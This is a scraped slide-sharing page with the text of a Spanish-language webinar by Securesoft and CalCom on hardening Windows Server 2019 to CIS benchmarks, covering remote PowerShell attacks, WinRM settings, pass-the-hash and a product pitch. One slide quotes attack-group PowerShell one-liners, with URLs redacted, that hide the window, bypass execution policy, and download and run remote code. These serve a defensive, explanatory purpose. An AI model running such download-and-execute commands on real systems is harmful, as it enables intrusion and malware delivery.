Ciberseguridad en GTD, SecureSoft en GTD Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD Cristian Garcia G.
 
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Cristian Garcia G.
 

Mais de Cristian Garcia G. (20)

Making App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyMaking App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously Easy
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al Negocio
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridad
 
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
 
Ciberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACiberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IA
 
Symantec Enterprise Cloud
Symantec Enterprise CloudSymantec Enterprise Cloud
Symantec Enterprise Cloud
 
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
 
Protección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterProtección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-Datacenter
 
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoLa Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
 
Gestión de la Exposición
Gestión de la ExposiciónGestión de la Exposición
Gestión de la Exposición
 
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
 
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoUn enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
 
La crisis de identidad que se avecina
La crisis de identidad que se avecinaLa crisis de identidad que se avecina
La crisis de identidad que se avecina
 
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoSimplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
 
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
 
La evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteLa evolución de IBM Qradar Suite
La evolución de IBM Qradar Suite
 
Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD
 
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
 

Último

EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxLolaBunny11
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfJulian Lamprea
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITMaricarmen Sánchez Ruiz
 

Último (10)

EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 

WINDOWS 2019 HARDENING (Aseguramiento)

  • 1. Windows 2019 Hardening Garantice el cumplimiento de CIS y evite interrupciones en la producción Eduardo Rivero Gerente de Consultoría y Servicios de Seguridad Jerry Ludmir CEO, CalCom Software Dvir Goren CTO, CalCom Software
  • 2. Eduardo Rivero Gerente de Consultoría y Servicios, Securesoft • Gerente Regional de consultoría y servicios especializados con más de 17 años de experiencia en tecnología y seguridad de la información. • Líder QA de proyectos consultivos de ciberseguridad, y gestión de respuesta ante incidentes. • Experto en estándares y normativas de seguridad a nivel global: ISO 27001/9001, COBIT, SANS, ENISA, PCI, entre otros. • Certificado como CRISC, CBCP, LCSPC, SFPC en el rubro. • En su trayectoria, ha liderado más de 150 proyectos consultivos de ciberseguridad en los últimos 07 años
  • 3. Jerry Ludmir CEO, CalCom • Veterano de la industria de TI, con mas de 30 años de experiencia en la industria • Emprendedor y fundador de grandes empresas en la industria de TI • Fundó Calcom hace 15 años manteniéndose en su rol de liderazgo Dvir Goren CTO, CalCom • Veterano de la industria de TI con mas de 25 años de experiencia en la industria • Líder de opinión en el campo del aseguramiento de servidores con más de 13 años de gestión de proyectos complejos de fortalecimiento • Consultor de las organizaciones de seguridad nacional en el tema del aseguramiento de servidores • Lidera el equipo de productos de CalCom durante los últimos 15 años, desarrollando la estrategia y roadmap del producto
  • 4. Introducción • CalCom ofrece soluciones de automatización para el proceso de aseguramiento en equipos de seguridad y TI. • Apoyando grandes organizaciones para lograr el aseguramiento de su infraestructura por mas de 15 años. • Hacemos felices tanto a equipos de seguridad como de TI!
  • 5. Agenda • Aseguramiento de Servidores – ¿Qué es? ¿Porqué es importante? • Proceso Manual de Aseguramiento • Esquemas de Cumplimiento – Acercándonos al benchmark de CIS • Escenarios de aseguramiento - lab • Introducción al enfoque de automatización de aseguramiento de Calcom
  • 6. Aseguramiento de Servidores – ¿Qué es? ¿Porqué? • Mejora de la seguridad del servidor a través de una variedad de cambios en la configuración para reducir la superficie de ataque • Cumplimiento/auditoría: PCI, FDIC, ciber regulaciones gubernamentales, NIST 800-53 • Prácticas recomendadas de seguridad: eliminación de vulnerabilidades críticas Servicios Asegurar Ataques SMBv1 Wannacry RDP Bluekeep, Dejablue, Ryuk TLS POODLE NTLM MTLM Relay
  • 7. Proceso Manual de Aseguramiento Definir la política • Colaboración y aprobación de seguridad, TI, gerencia, auditoría • Granularidad de políticas: por función del servidor, versión del sistema operativo, etc. • Política basada en puntos de referencia conocidos Prueba de Laboratorio • Simular la producción en un entorno de prueba. • Realizar pruebas para evitar interrumpir la producción. Asegurando el Servidor • Asegurar los entornos de prueba y pre-producción antes de pasar a producción • Fortalecimiento del entorno de producción: ¿cómo? (GPO, manualmente, herramientas)
  • 8. Benchmarks de Cumplimiento - CIS Benchmarks • Documento de casi 1,000 páginas • Más de 400 recomendaciones de aseguramiento
  • 9. Benchmarks de Cumplimiento - CIS Benchmarks
  • 10.
  • 11.
  • 13. Escenario #1: Ataque Malicioso via PowerShell remoto PowerShell Como Plataforma de Ataque • Ataques maliciosos con PowerShell crecieron 661% en 2019* • PowerShell está en todos lados: plataformas de sistemas operativos, protocolos, aplicaciones, nube etc. • Interface con .NET y APIs de Windows • CMD.exe está normalmente bloqueado, pero no PowerShell • Ejecuta código en memoria sin tocar el disco • Descarga y ejecuta código desde otro sistema (Remote execution attack) • Una vez el intruso tiene acceso, todas las herramientas estándar del sistema operativo le están disponibles • Ataques mas famosos son Petya y NotPetya *Symantec security Center
  • 14. Attack groups Script invocations Pupa/ DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c “IEX ((new-object net.webclient). downloadstring([REMOVED]))” Pupa/ DeepPanda powershell.exe -Win hidden -Enc [REMOVED] Pupa/ DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED] SeaDuke powershell -executionpolicy bypass -File diag3.ps1 SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] - Password [REMOVED] -Mailbox CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED] Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED] Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile(“””http://[REMOVED]/ images/rec.exe”””,”””$env:tmprec.exe”””);Iex %tmp%rec.exe Ejemplos de script usados en ataques dirigidos • Estos ataques son muy difíciles de detectar por los equipos de ciberseguridad • Se ven como actividad normal de usuarios Escenario #1: Ataque Malicioso via PowerShell remoto
  • 15. Setting: Name Category Default Value 2016 CIS 2016 CIS Control Level (2016) CIS Control ## (2016) Default Value 2019 CIS MS2019 CIS Control Level (2019) CIS Control # (2019) Allow Basic authentication WinRM Client Disabled L1 18.9.97.1.1 Disabled. (The WinRM client does not use Basic authentication.) Disabled L1 18.9.97.1.1 Allow unencrypted traffic WinRM Client Disabled L1 18.9.97.1.2 Disabled. (The WinRM client sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.1.2 Disallow Digest authentication WinRM Client Enabled L1 18.9.97.1.3 Disabled. (The WinRM client will use Digest authentication.) Enabled L1 18.9.97.1.3 Allow Basic authentication WinRM Service Disabled L1 18.9.97.2.1 Disabled. (The WinRM service will not accept Basic authentication from a remote client.) Disabled L1 18.9.97.2.1 Allow remote server management through WinRM WinRM Service Disabled L2 18.9.97.2.2 Disabled. (The WinRM service will not respond to requests from a remote computer, regardless of whether or not any WinRM listeners are configured.) Disabled L2 18.9.97.2.2 Allow unencrypted traffic WinRM Service Disabled L1 18.9.97.2.3 Disabled. (The WinRM service sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.2.3 Disallow WinRM from storing RunAs credentials WinRM Service Enabled L1 18.9.97.2.4 Disabled. (The WinRM service will allow the RunAsUser and RunAsPassword configuration values to be set for plug-ins and the RunAsPassword value will be stored securely.) Enabled L1 18.9.97.2.4 Allow Remote Shell Access Windows Remote Shell Disabled L2 18.9.98.1 Enabled. (New Remote Shell connections are allowed.) Disabled L2 18.9.98.1 Escenario #1: Ataque Malicioso via PowerShell remoto Recomendaciones de CIS
  • 16. 18.9.97.2.2 (L2) Ensure 'Allow remote server management through WinRM' is set to 'Disabled' (Scored) • GPO: Computer ConfigurationAdministrative TemplatesWindows ComponentsWindows Remote Management (WinRM)WinRM ServiceAllow remote server management through WinRM • Reg: HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRMServiceAllowAutoConfig Nota: • Según CIS no hay impacto en el servidor porque es el comportamientos por defecto • Es correcto solo para servidores recién instalados pero no considera las actividades administrativas posteriores en el ambiente Escenario #1: Ataque Malicioso via PowerShell remoto
  • 17. Ejemplo de Comandos: Escenario #1: Ataque Malicioso via PowerShell remoto
  • 18. Ejemplos de Comandos: Invoke-Command -ComputerName win2016iis -Credential chslabdave -ScriptBlock { Get-Culture} Escenario #1: Ataque Malicioso via PowerShell remoto
  • 19. Buscar en el log de eventos – event id 600: Nota: HostApplication=C:Wind owssystem32wsmprov host.exe -Embedding El host de PowerShell wsmprovhost.exe es un proceso proxy ejecutado de forma remota a través de PowerShell cuando se usa la Administración Remota de Windows (WinRM) Escenario #1: Ataque Malicioso via PowerShell remoto
  • 20. • Pass the Hash es una técnica de ataque que permite a un atacante autenticarse en un servidor o servicio remoto mediante el uso del hash NTLM o LM de la contraseña de un usuario. • Reemplaza la necesidad de robar la contraseña de texto sencillo • Proceso de ataque: • Obtiene el hash del nombre de usuario y su contraseña • Usa el hash (o contraseña) para autenticar el servidor remoto • Usa LM o NTLM • No es necesario aplicar fuerza bruta a los hash para obtener el texto de la contraseña sin cifrar • Debilidad: en el protocolo de autenticación, donde el hash de la contraseña permanece estático de una sesión a otra hasta que la contraseña se cambie . • Se puede realizar contra cualquier servidor o servicio que acepte autenticación LM o NTLM (Windows, Unix o cualquier otro sistema operativo). Escenario #2: Ataque Pass the Hash
  • 21. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) • GPO: Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity OptionsNetwork access: Do not allow storage of passwords and credentials for network authentication • Reg: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa:DisableDomainCreds Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 22. Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 23. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
  • 24. Automatización es esencial. Veamos como se puede hacer…
  • 25. CHS – El Proceso de Aseguramiento MODO APRENDIZAJE Simula el impacto de la política en el ambiente de producción MODO APLICACIÓN Aplica las políticas que endurecen cada servidor individualmente MODO MONITOREO Protege y controla el acceso en tiempo real
  • 26.
  • 27.
  • 28.
  • 29. CHS de Calcom • Automatiza el proceso de prueba de políticas. • Realiza un análisis de impacto de políticas directamente en el ambiente de producción • Aplica una política granular por servidor / versión / rol • Garantiza el cumplimiento continuo
  • 30. Contacte a CalCom Estamos aquí para ayudarlos con su proyecto de aseguramiento! Contáctenos vía: Email: info@calcomsoftware.com Página web de CalCom: www.calcomsoftware.com
  • 31. Q&A Use la función de Q&A de Zoom Escribanos también por el chat